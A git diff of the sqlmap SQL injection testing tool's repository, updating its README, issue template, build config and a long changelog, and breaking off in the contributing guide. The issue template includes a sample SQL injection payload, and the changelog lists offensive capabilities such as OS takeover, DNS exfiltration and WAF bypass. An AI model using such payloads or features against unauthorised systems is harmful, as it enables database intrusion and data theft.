diff --git a/.gitattributes b/.gitattributes index a6b6a3526..806cf1b9a 100644 --- a/.gitattributes +++ b/.gitattributes @@ -1,5 +1,8 @@ -*.py text eol=lf *.conf text eol=lf +*.md text eol=lf +*.md5 text eol=lf +*.py text eol=lf +*.xml text eol=lf *_ binary *.dll binary diff --git a/.gitignore b/.gitignore index ff18ea796..81f587778 100644 --- a/.gitignore +++ b/.gitignore @@ -2,4 +2,5 @@ output/ .sqlmap_history traffic.txt -*~ \ No newline at end of file +*~ +.idea/ \ No newline at end of file diff --git a/.travis.yml b/.travis.yml new file mode 100644 index 000000000..7bfe0cef7 --- /dev/null +++ b/.travis.yml @@ -0,0 +1,6 @@ +language: python +python: + - "2.6" + - "2.7" +script: + - python -c "import sqlmap; import sqlmapapi" diff --git a/ISSUE_TEMPLATE.md b/ISSUE_TEMPLATE.md new file mode 100644 index 000000000..062912bd6 --- /dev/null +++ b/ISSUE_TEMPLATE.md @@ -0,0 +1,26 @@ +## What's the problem (or question)? + + + +## Do you have an idea for a solution? + + + +## How can we reproduce the issue? + +1. +2. +3. +4. + +## What are the running context details? + +* Installation method (e.g. `pip`, `apt-get`, `git clone` or `zip`/`tar.gz`): +* Client OS (e.g. `Microsoft Windows 10`) +* Program version (`python sqlmap.py --version` or `sqlmap --version` depending on installation): +* Target DBMS (e.g. `Microsoft SQL Server`): +* Detected WAF/IDS/IPS protection (e.g. `ModSecurity` or `unknown`): +* SQLi techniques found by sqlmap (e.g. `error-based` and `boolean-based blind`): +* Results of manual target assessment (e.g. found that the payload `query=test' AND 4113 IN ((SELECT 'foobar'))-- qKLV` works): +* Relevant console output (if any): +* Exception traceback (if any): diff --git a/README.md b/README.md index 8115c5dd5..ae16583ff 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@ -sqlmap -== +# sqlmap +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. @@ -18,7 +18,7 @@ You can download the latest tarball by clicking [here](https://github.com/sqlmap Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlmapproject/sqlmap) repository: - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev sqlmap works out of the box with [Python](http://www.python.org/download/) version **2.6.x** and **2.7.x** on any platform. @@ -33,8 +33,8 @@ To get a list of all options and switches use: python sqlmap.py -hh -You can find a sample run [here](https://gist.github.com/stamparm/5335217). -To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki). +You can find a sample run [here](https://asciinema.org/a/46601). +To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage). Links ---- @@ -45,9 +45,6 @@ Links * Issue tracker: https://github.com/sqlmapproject/sqlmap/issues * User's manual: https://github.com/sqlmapproject/sqlmap/wiki * Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Mailing list subscription: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap * Twitter: [@sqlmap](https://twitter.com/sqlmap) * Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) * Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots @@ -55,8 +52,14 @@ Links Translations ---- +* [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md) * [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md) * [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md) +* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md) * [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md) * [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md) +* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md) +* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md) * [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md) +* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md) +* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md) diff --git a/doc/CHANGELOG.md b/doc/CHANGELOG.md index e656280cc..1e3284055 100644 --- a/doc/CHANGELOG.md +++ b/doc/CHANGELOG.md @@ -1,14 +1,12 @@ -# Version 1.0 (upcoming) +# Version 1.0 (2016-02-27) * Implemented support for automatic decoding of page content through detected charset. * Implemented mechanism for proper data dumping on DBMSes not supporting `LIMIT/OFFSET` like mechanism(s) (e.g. Microsoft SQL Server, Sybase, etc.). * Major improvements to program stabilization based on user reports. * Added new tampering scripts avoiding popular WAF/IPS/IDS mechanisms. -* Added support for setting Tor proxy type together with port. * Fixed major bug with DNS leaking in Tor mode. * Added wordlist compilation made of the most popular cracking dictionaries. -* Added support for mnemonics substantially helping user with program setup. -* Implemented multi-processor hash cracking routine(s) on Linux OS. +* Implemented multi-processor hash cracking routine(s). * Implemented advanced detection techniques for inband and time-based injections by usage of standard deviation method. * Old resume files are now deprecated and replaced by faster SQLite based session mechanism. * Substantial code optimization and smaller memory footprint. @@ -28,9 +26,72 @@ * Added switch `--check-waf` for checking of existence of WAF/IPS/IDS protection. * Added switch `--schema` to enumerate DBMS schema: shows all columns of all databases' tables. * Added switch `--count` to count the number of entries for a specific table or all database(s) tables. -* Major improvements to switches --tables and --columns. -* Takeover switch --os-pwn improved: stealthier, faster and AV-proof. -* Added switch --mobile to imitate a mobile device through HTTP User-Agent header. +* Major improvements to switches `--tables` and `--columns`. +* Takeover switch `--os-pwn` improved: stealthier, faster and AV-proof. +* Added switch `--mobile` to imitate a mobile device through HTTP User-Agent header. +* Added switch `-a` to enumerate all DBMS data. +* Added option `--alert` to run host OS command(s) when SQL injection is found. +* Added option `--answers` to set user answers to asked questions during sqlmap run. +* Added option `--auth-file` to set HTTP authentication PEM cert/private key file. +* Added option `--charset` to force character encoding used during data retrieval. +* Added switch `--check-tor` to force checking of proper usage of Tor. +* Added option `--code` to set HTTP code to match when query is evaluated to True. +* Added option `--cookie-del` to set character to be used while splitting cookie values. +* Added option `--crawl` to set the crawling depth for the website starting from the target URL. +* Added option `--crawl-exclude` for setting regular expression for excluding pages from crawling (e.g. `"logout"`). +* Added option `--csrf-token` to set the parameter name that is holding the anti-CSRF token. +* Added option `--csrf-url` for setting the URL address for extracting the anti-CSRF token. +* Added option `--csv-del` for setting the delimiting character that will be used in CSV output (default `,`). +* Added option `--dbms-cred` to set the DBMS authentication credentials (user:password). +* Added switch `--dependencies` for turning on the checking of missing (non-core) sqlmap dependencies. +* Added switch `--disable-coloring` to disable console output coloring. +* Added option `--dns-domain` to set the domain name for usage in DNS exfiltration attack(s). +* Added option `--dump-format` to set the format of dumped data (`CSV` (default), `HTML` or `SQLITE`). +* Added option `--eval` for setting the Python code that will be evaluated before the request. +* Added switch `--force-ssl` to force usage of SSL/HTTPS. +* Added switch `--hex` to force usage of DBMS hex function(s) for data retrieval. +* Added option `-H` to set extra HTTP header (e.g. `"X-Forwarded-For: 127.0.0.1"`). +* Added switch `-hh` for showing advanced help message. +* Added option `--host` to set the HTTP Host header value. +* Added switch `--hostname` to turn on retrieval of DBMS server hostname. +* Added switch `--hpp` to turn on the usage of HTTP parameter pollution WAF bypass method. +* Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS/IDS protection. +* Added switch `--ignore-401` to ignore HTTP Error Code 401 (Unauthorized). +* Added switch `--invalid-bignum` for usage of big numbers while invalidating values. +* Added switch `--invalid-logical` for usage of logical operations while invalidating values. +* Added switch `--invalid-string` for usage of random strings while invalidating values. +* Added option `--load-cookies` to set the file containing cookies in Netscape/wget format. +* Added option `-m` to set the textual file holding multiple targets for scanning purposes. +* Added option `--method` to force usage of provided HTTP method (e.g. `PUT`). +* Added switch `--no-cast` for turning off payload casting mechanism. +* Added switch `--no-escape` for turning off string escaping mechanism. +* Added option `--not-string` for setting string to be matched when query is evaluated to False. +* Added switch `--offline` to force work in offline mode (i.e. only use session data). +* Added option `--output-dir` to set custom output directory path. +* Added option `--param-del` to set character used for splitting parameter values. +* Added option `--pivot-column` to set column name that will be used while dumping tables by usage of pivot(ing). +* Added option `--proxy-file` to set file holding proxy list. +* Added switch `--purge-output` to turn on safe removal of all content(s) from output directory. +* Added option `--randomize` to set parameter name(s) that will be randomly changed during sqlmap run. +* Added option `--safe-post` to set POST data for sending to safe URL. +* Added option `--safe-req` for loading HTTP request from a file that will be used during sending to safe URL. +* Added option `--skip` to skip testing of given parameter(s). +* Added switch `--skip-static` to skip testing parameters that not appear to be dynamic. +* Added switch `--skip-urlencode` to skip URL encoding of payload data. +* Added switch `--skip-waf` to skip heuristic detection of WAF/IPS/IDS protection. +* Added switch `--smart` to conduct thorough tests only if positive heuristic(s). +* Added option `--sql-file` for setting file(s) holding SQL statements to be executed (in case of stacked SQLi). +* Added switch `--sqlmap-shell` to turn on interactive sqlmap shell prompt. +* Added option `--test-filter` for test filtration by payloads and/or titles (e.g. `ROW`). +* Added option `--test-skip` for skipping tests by payloads and/or titles (e.g. `BENCHMARK`). +* Added switch `--titles` to turn on comparison of pages based only on their titles. +* Added option `--tor-port` to explicitly set Tor proxy port. +* Added option `--tor-type` to set Tor proxy type (`HTTP` (default), `SOCKS4` or `SOCKS5`). +* Added option `--union-from` to set table to be used in `FROM` part of UNION query SQL injection. +* Added option `--where` to set `WHERE` condition to be used during the table dumping. +* Added option `-X` to exclude DBMS database table column(s) from enumeration. +* Added option `-x` to set URL of sitemap(.xml) for target(s) parsing. +* Added option `-z` for usage of short mnemonics (e.g. `"flu,bat,ban,tec=EU"`). # Version 0.9 (2011-04-10) @@ -43,7 +104,7 @@ * Extended old `--dump -C` functionality to be able to search for specific database(s), table(s) and column(s), option `--search`. * Added support to tamper injection data with option `--tamper`. * Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack. -* Added support to enumerate roles on Oracle, --roles switch. +* Added support to enumerate roles on Oracle, `--roles` switch. * Added support for SOAP based web services requests. * Added support to fetch unicode data. * Added support to use persistent HTTP(s) connection for speed improvement, switch `--keep-alive`. @@ -88,18 +149,18 @@ * Major bugs fixed. * Cleanup of UDF source code repository, https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack. * Major code cleanup. -* Added simple file encryption/compression utility, extra/cloak/cloak.py, used by sqlmap to decrypt on the fly Churrasco, UPX executable and web shells consequently reducing drastically the number of anti-virus softwares that mistakenly mark sqlmap as a malware. +* Added simple file encryption/compression utility, extra/cloak/cloak.py, used by sqlmap to decrypt on the fly Churrasco, UPX executable and web shells consequently reducing drastically the number of anti-virus software that mistakenly mark sqlmap as a malware. * Updated user's manual. * Created several demo videos, hosted on YouTube (http://www.youtube.com/user/inquisb) and linked from http://sqlmap.org/demo.html. # Version 0.8 release candidate (2009-09-21) -* Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. +* Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (`--os-bof`) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. -* Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. -* Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. +* Added support for `--first` and `--last` so the user now has even more granularity in what to enumerate in the query output. +* Minor enhancement to save the session by default in 'output/hostname/session' file if `-s` option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring. @@ -108,13 +169,13 @@ * Adapted Metasploit wrapping functions to work with latest 3.3 development version too. * Adjusted code to make sqlmap 0.7 to work again on Mac OSX too. -* Reset takeover OOB features (if any of --os-pwn, --os-smbrelay or --os-bof is selected) when running under Windows because msfconsole and msfcli are not supported on the native Windows Ruby interpreter. This make sqlmap 0.7 to work again on Windows too. +* Reset takeover OOB features (if any of `--os-pwn`, `--os-smbrelay` or `--os-bof` is selected) when running under Windows because msfconsole and msfcli are not supported on the native Windows Ruby interpreter. This make sqlmap 0.7 to work again on Windows too. * Minor improvement so that sqlmap tests also all parameters with no value (eg. par=). * HTTPS requests over HTTP proxy now work on either Python 2.4, 2.5 and 2.6+. * Major bug fix to sql-query/sql-shell features. -* Major bug fix in --read-file option. +* Major bug fix in `--read-file` option. * Major silent bug fix to multi-threading functionality. -* Fixed the web backdoor functionality (for MySQL) when (usually) stacked queries are not supported and --os-shell is provided. +* Fixed the web backdoor functionality (for MySQL) when (usually) stacked queries are not supported and `--os-shell` is provided. * Fixed MySQL 'comment injection' version fingerprint. * Fixed basic Microsoft SQL Server 2000 fingerprint. * Many minor bug fixes and code refactoring. @@ -136,32 +197,32 @@ * Major enhancement to make the comparison algorithm work properly also on url not stables automatically by using the difflib Sequence Matcher object; * Major enhancement to support SQL data definition statements, SQL data manipulation statements, etc from user in SQL query and SQL shell if stacked queries are supported by the web application technology; * Major speed increase in DBMS basic fingerprint; -* Minor enhancement to support an option (--is-dba) to show if the current user is a database management system administrator; -* Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause bruteforcing; -* Added internal support to forge CASE statements, used only by --is-dba query at the moment; -* Minor layout adjustment to the --update output; +* Minor enhancement to support an option (`--is-dba`) to show if the current user is a database management system administrator; +* Minor enhancement to support an option (`--union-tech`) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause bruteforcing; +* Added internal support to forge CASE statements, used only by `--is-dba` query at the moment; +* Minor layout adjustment to the `--update` output; * Increased default timeout to 30 seconds; * Major bug fix to correctly handle custom SQL "limited" queries on Microsoft SQL Server and Oracle; * Major bug fix to avoid tracebacks when multiple targets are specified and one of them is not reachable; * Minor bug fix to make the Partial UNION query SQL injection technique work properly also on Oracle and Microsoft SQL Server; -* Minor bug fix to make the --postfix work even if --prefix is not provided; +* Minor bug fix to make the `--postfix` work even if `--prefix` is not provided; * Updated documentation. # Version 0.6.3 (2008-12-18) * Major enhancement to get list of targets to test from Burp proxy (http://portswigger.net/suite/) requests log file path or WebScarab proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project) 'conversations/' folder path by providing option -l ; * Major enhancement to support Partial UNION query SQL injection technique too; -* Major enhancement to test if the web application technology supports stacked queries (multiple statements) by providing option --stacked-test which will be then used someday also by takeover functionality; -* Major enhancement to test if the injectable parameter is affected by a time based blind SQL injection technique by providing option --time-test; +* Major enhancement to test if the web application technology supports stacked queries (multiple statements) by providing option `--stacked-test` which will be then used someday also by takeover functionality; +* Major enhancement to test if the injectable parameter is affected by a time based blind SQL injection technique by providing option `--time-test`; * Minor enhancement to fingerprint the web server operating system and the web application technology by parsing some HTTP response headers; * Minor enhancement to fingerprint the back-end DBMS operating system by parsing the DBMS banner value when -b option is provided; -* Minor enhancement to be able to specify the number of seconds before timeout the connection by providing option --timeout #, default is set to 10 seconds and must be 3 or higher; -* Minor enhancement to be able to specify the number of seconds to wait between each HTTP request by providing option --delay #; -* Minor enhancement to be able to get the injection payload --prefix and --postfix from user; +* Minor enhancement to be able to specify the number of seconds before timeout the connection by providing option `--timeout #`, default is set to 10 seconds and must be 3 or higher; +* Minor enhancement to be able to specify the number of seconds to wait between each HTTP request by providing option `--delay #`; +* Minor enhancement to be able to get the injection payload `--prefix` and `--postfix` from user; * Minor enhancement to be able to enumerate table columns and dump table entries, also when the database name is not provided, by using the current database on MySQL and Microsoft SQL Server, the 'public' scheme on PostgreSQL and the 'USERS' TABLESPACE_NAME on Oracle; -* Minor enhancemet to support also --regexp, --excl-str and --excl-reg options rather than only --string when comparing HTTP responses page content; -* Minor enhancement to be able to specify extra HTTP headers by providing option --headers. By default Accept, Accept-Language and Accept-Charset headers are set; -* Minor improvement to be able to provide CU (as current user) as user value (-U) when enumerating users privileges or users passwords; +* Minor enhancemet to support also `--regexp`, `--excl-str` and `--excl-reg` options rather than only `--string` when comparing HTTP responses page content; +* Minor enhancement to be able to specify extra HTTP headers by providing option `--headers`. By default Accept, Accept-Language and Accept-Charset headers are set; +* Minor improvement to be able to provide CU (as current user) as user value (`-U`) when enumerating users privileges or users passwords; * Minor improvements to sqlmap Debian package files; * Minor improvement to use Python psyco (http://psyco.sourceforge.net/) library if available to speed up the sqlmap algorithmic operations; * Minor improvement to retry the HTTP request up to three times in case an exception is raised during the connection to the target url; @@ -175,10 +236,10 @@ # Version 0.6.2 (2008-11-02) -* Major bug fix to correctly dump tables entries when --stop is not specified; +* Major bug fix to correctly dump tables entries when `--stop` is not specified; * Major bug fix so that the users' privileges enumeration now works properly also on both MySQL < 5.0 and MySQL >= 5.0; * Major bug fix when the request is POST to also send the GET parameters if any have been provided; -* Major bug fix to correctly update sqlmap to the latest stable release with command line --update; +* Major bug fix to correctly update sqlmap to the latest stable release with command line `--update`; * Major bug fix so that when the expected value of a query (count variable) is an integer and, for some reasons, its resumed value from the session file is a string or a binary file, the query is executed again and its new output saved to the session file; * Minor bug fix in MySQL comment injection fingerprint technique; * Minor improvement to correctly enumerate tables, columns and dump tables entries on Oracle and on PostgreSQL when the database name is not 'public' schema or a system database; @@ -191,20 +252,20 @@ * Major bug fix to blind SQL injection bisection algorithm to handle an exception; * Added a Metasploit Framework 3 auxiliary module to run sqlmap; * Implemented possibility to test for and inject also on LIKE statements; -* Implemented --start and --stop options to set the first and the last table entry to dump; -* Added non-interactive/batch-mode (--batch) option to make it easy to wrap sqlmap in Metasploit and any other tool; +* Implemented `--start` and `--stop` options to set the first and the last table entry to dump; +* Added non-interactive/batch-mode (`--batch`) option to make it easy to wrap sqlmap in Metasploit and any other tool; * Minor enhancement to save also the length of query output in the session file when retrieving the query output length for ETA or for resume purposes; * Changed the order sqlmap dump table entries from column by column to row by row. Now it also dumps entries as they are stored in the tables, not forcing the entries' order alphabetically anymore; -* Minor bug fix to correctly handle parameters' value with % character. +* Minor bug fix to correctly handle parameters' value with `%` character. # Version 0.6 (2008-09-01) * Complete code refactor and many bugs fixed; * Added multithreading support to set the maximum number of concurrent HTTP requests; -* Implemented SQL shell (--sql-shell) functionality and fixed SQL query (--sql-query, before called -e) to be able to run whatever SELECT statement and get its output in both inband and blind SQL injection attack; -* Added an option (--privileges) to retrieve DBMS users privileges, it also notifies if the user is a DBMS administrator; -* Added support (-c) to read options from configuration file, an example of valid INI file is sqlmap.conf and support (--save) to save command line options on a configuration file; -* Created a function that updates the whole sqlmap to the latest stable version available by running sqlmap with --update option; +* Implemented SQL shell (`--sql-shell`) functionality and fixed SQL query (`--sql-query`, before called `-e`) to be able to run whatever SELECT statement and get its output in both inband and blind SQL injection attack; +* Added an option (`--privileges`) to retrieve DBMS users privileges, it also notifies if the user is a DBMS administrator; +* Added support (`-c`) to read options from configuration file, an example of valid INI file is sqlmap.conf and support (`--save`) to save command line options on a configuration file; +* Created a function that updates the whole sqlmap to the latest stable version available by running sqlmap with `--update` option; * Created sqlmap .deb (Debian, Ubuntu, etc.) and .rpm (Fedora, etc.) installation binary packages; * Created sqlmap .exe (Windows) portable executable; * Save a lot of more information to the session file, useful when resuming injection on the same target to not loose time on identifying injection, UNION fields and back-end DBMS twice or more times; @@ -216,8 +277,8 @@ * Improved XML files structure; * Implemented the possibility to change the HTTP Referer header; * Added support to resume from session file also when running with inband SQL injection attack; -* Added an option (--os-shell) to execute operating system commands if the back-end DBMS is MySQL, the web server has the PHP engine active and permits write access on a directory within the document root; -* Added a check to assure that the provided string to match (--string) is within the page content; +* Added an option (`--os-shell`) to execute operating system commands if the back-end DBMS is MySQL, the web server has the PHP engine active and permits write access on a directory within the document root; +* Added a check to assure that the provided string to match (`--string`) is within the page content; * Fixed various queries in XML file; * Added LIMIT, ORDER BY and COUNT queries to the XML file and adapted the library to parse it; * Fixed password fetching function, mainly for Microsoft SQL Server and reviewed the password hashes parsing function; @@ -225,7 +286,7 @@ * Enhanced logging system: added three more levels of verbosity to show also HTTP sent and received traffic; * Enhancement to handle Set-Cookie from target url and automatically re-establish the Session when it expires; * Added support to inject also on Set-Cookie parameters; -* Implemented TAB completion and command history on both --sql-shell and --os-shell; +* Implemented TAB completion and command history on both `--sql-shell` and `--os-shell`; * Renamed some command line options; * Added a conversion library; * Added code schema and reminders for future developments; @@ -237,19 +298,19 @@ # Version 0.5 (2007-11-04) * Added support for Oracle database management system -* Extended inband SQL injection functionality (--union-use) to all other possible queries since it only worked with -e and --file on all DMBS plugins; +* Extended inband SQL injection functionality (`--union-use`) to all other possible queries since it only worked with `-e` and `--file` on all DMBS plugins; * Added support to extract database users password hash on Microsoft SQL Server; * Added a fuzzer function with the aim to parse HTML page looking for standard database error messages consequently improving database fingerprinting; * Added support for SQL injection on HTTP Cookie and User-Agent headers; -* Reviewed HTTP request library (lib/request.py) to support the extended inband SQL injection functionality. Splitted getValue() into getInband() and getBlind(); +* Reviewed HTTP request library (lib/request.py) to support the extended inband SQL injection functionality. Split getValue() into getInband() and getBlind(); * Major enhancements in common library and added checkForBrackets() method to check if the bracket(s) are needed to perform a UNION query SQL injection attack; -* Implemented --dump-all functionality to dump entire DBMS data from all databases tables; -* Added support to exclude DBMS system databases' when enumeration tables and dumping their entries (--exclude-sysdbs); +* Implemented `--dump-all` functionality to dump entire DBMS data from all databases tables; +* Added support to exclude DBMS system databases' when enumeration tables and dumping their entries (`--exclude-sysdbs`); * Implemented in Dump.dbTableValues() method the CSV file dumped data automatic saving in csv/ folder by default; * Added DB2, Informix and Sybase DBMS error messages and minor improvements in xml/errors.xml; * Major improvement in all three DBMS plugins so now sqlmap does not get entire databases' tables structure when all of database/table/ column are specified to be dumped; * Important fixes in lib/option.py to make sqlmap properly work also with python 2.5 and handle the CSV dump files creation work also under Windows operating system, function __setCSVDir() and fixed also in lib/dump.py; -* Minor enhancement in lib/injection.py to randomize the number requested to test the presence of a SQL injection affected parameter and implemented the possibilities to break (q) the for cycle when using the google dork option (-g); +* Minor enhancement in lib/injection.py to randomize the number requested to test the presence of a SQL injection affected parameter and implemented the possibilities to break (q) the for cycle when using the google dork option (`-g`); * Minor fix in lib/request.py to properly encode the url to request in case the "fixed" part of the url has blank spaces; * More minor layout enhancements in some libraries; * Renamed DMBS plugins; @@ -260,21 +321,21 @@ * Added DBMS fingerprint based also upon HTML error messages parsing defined in lib/parser.py which reads an XML file defining default error messages for each supported DBMS; * Added Microsoft SQL Server extensive DBMS fingerprint checks based upon accurate '@@version' parsing matching on an XML file to get also the exact patching level of the DBMS; -* Added support for query ETA (Estimated Time of Arrival) real time calculation (--eta); -* Added support to extract database management system users password hash on MySQL and PostgreSQL (--passwords); +* Added support for query ETA (Estimated Time of Arrival) real time calculation (`--eta`); +* Added support to extract database management system users password hash on MySQL and PostgreSQL (`--passwords`); * Added docstrings to all functions, classes and methods, consequently released the sqlmap development documentation ; -* Implemented Google dorking feature (-g) to take advantage of Google results affected by SQL injection to perform other command line argument on their DBMS; +* Implemented Google dorking feature (`-g`) to take advantage of Google results affected by SQL injection to perform other command line argument on their DBMS; * Improved logging functionality: passed from banal 'print' to Python native logging library; -* Added support for more than one parameter in '-p' command line option; -* Added support for HTTP Basic and Digest authentication methods (--basic-auth and --digest-auth); -* Added the command line option '--remote-dbms' to manually specify the remote DBMS; -* Major improvements in union.UnionCheck() and union.UnionUse() functions to make it possible to exploit inband SQL injection also with database comment characters ('--' and '#') in UNION query statements; -* Added the possibility to save the output into a file while performing the queries (-o OUTPUTFILE) so it is possible to stop and resume the same query output retrieving in a second time (--resume); -* Added support to specify the database table column to enumerate (-C COL); -* Added inband SQL injection (UNION query) support (--union-use); +* Added support for more than one parameter in `-p` command line option; +* Added support for HTTP Basic and Digest authentication methods (`--basic-auth` and `--digest-auth`); +* Added the command line option `--remote-dbms` to manually specify the remote DBMS; +* Major improvements in union.UnionCheck() and union.UnionUse() functions to make it possible to exploit inband SQL injection also with database comment characters (`--` and `#`) in UNION query statements; +* Added the possibility to save the output into a file while performing the queries (`-o OUTPUTFILE`) so it is possible to stop and resume the same query output retrieving in a second time (`--resume`); +* Added support to specify the database table column to enumerate (`-C COL`); +* Added inband SQL injection (UNION query) support (`--union-use`); * Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements; * Reviewed the directory tree structure; -* Splitted lib/common.py: inband injection functionalities now are moved to lib/union.py; +* Split lib/common.py: inband injection functionalities now are moved to lib/union.py; * Updated documentation files. # Version 0.3 (2007-01-20) @@ -282,10 +343,10 @@ * Added module for MS SQL Server; * Strongly improved MySQL dbms active fingerprint and added MySQL comment injection check; * Added PostgreSQL dbms active fingerprint; -* Added support for string match (--string); -* Added support for UNION check (--union-check); +* Added support for string match (`--string`); +* Added support for UNION check (`--union-check`); * Removed duplicated code, delegated most of features to the engine in common.py and option.py; -* Added support for --data command line argument to pass the string for POST requests; +* Added support for `--data` command line argument to pass the string for POST requests; * Added encodeParams() method to encode url parameters before making http request; * Many bug fixes; * Rewritten documentation files; diff --git a/CONTRIBUTING.md b/doc/CONTRIBUTING.md similarity index 74% rename from CONTRIBUTING.md rename to doc/CONTRIBUTING.md index 1de4a195d..31b389e60 100644 --- a/CONTRIBUTING.md +++ b/doc/CONTRIBUTING.md @@ -1,38 +1,37 @@ -# Contributing to sqlmap - -## Reporting bugs - -**Bug reports are welcome**! -Please report all bugs on the [issue tracker](https://github.com/sqlmapproject/sqlmap/issues). - -### Guidelines - -* Before you submit a bug report, search both [open](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) issues to make sure the issue has not come up before. Also, check the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) for anything relevant. -* Make sure you can reproduce the bug with the latest development version of sqlmap. -* Your report should give detailed instructions on how to reproduce the problem. If sqlmap raises an unhandled exception, the entire traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal. -* If you are making an enhancement request, lay out the rationale for the feature you are requesting. *Why would this feature be useful?* -* If you are not sure whether something is a bug, or want to discuss a potential new feature before putting in an enhancement request, the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users) is a good place to bring it up. - -## Submitting code changes - -All code contributions are greatly appreciated. First off, clone the [Git repository](https://github.com/sqlmapproject/sqlmap), read the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) carefully, go through the code yourself and [drop us an email](mailto:dev@sqlmap.org) if you are having a hard time grasping its structure and meaning. We apologize for not commenting the code enough - you could take a chance to read it through and [improve it](https://github.com/sqlmapproject/sqlmap/issues/37). - -Our preferred method of patch submission is via a Git [pull request](https://help.github.com/articles/using-pull-requests). -Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md) have contributed in different ways to the sqlmap development. **You** can be the next! - -### Guidelines - -In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions: - -* Each patch should make one logical change. -* Wrap code to 76 columns when possible. -* Avoid tabbing, use four blank spaces instead. -* Before you put time into a non-trivial patch, it is worth discussing it on the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users) or privately by [email](mailto:dev@sqlmap.org). -* Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected. -* Make changes on less than five files per single pull request - there is rarely a good reason to have more than five files changed on one pull request, as this dramatically increases the review time required to land (commit) any of those pull requests. -* Style that is too different from main branch will be ''adapted'' by the developers side. -* Do not touch anything inside `thirdparty/` and `extra/` folders. - -### Licensing - -By submitting code contributions to the sqlmap developers, to the mailing list, or via Git pull request, checking them into the sqlmap source code repository, it is understood (unless you specify otherwise) that you are offering the sqlmap copyright holders the unlimited, non-exclusive right to reuse, modify, and relicense the code. This is important because the inability to relicense code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them. +# Contributing to sqlmap + +## Reporting bugs + +**Bug reports are welcome**! +Please report all bugs on the [issue tracker](https://github.com/sqlmapproject/sqlmap/issues). + +### Guidelines + +* Before you submit a bug report, search both [open](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) issues to make sure the issue has not come up before. Also, check the [user's 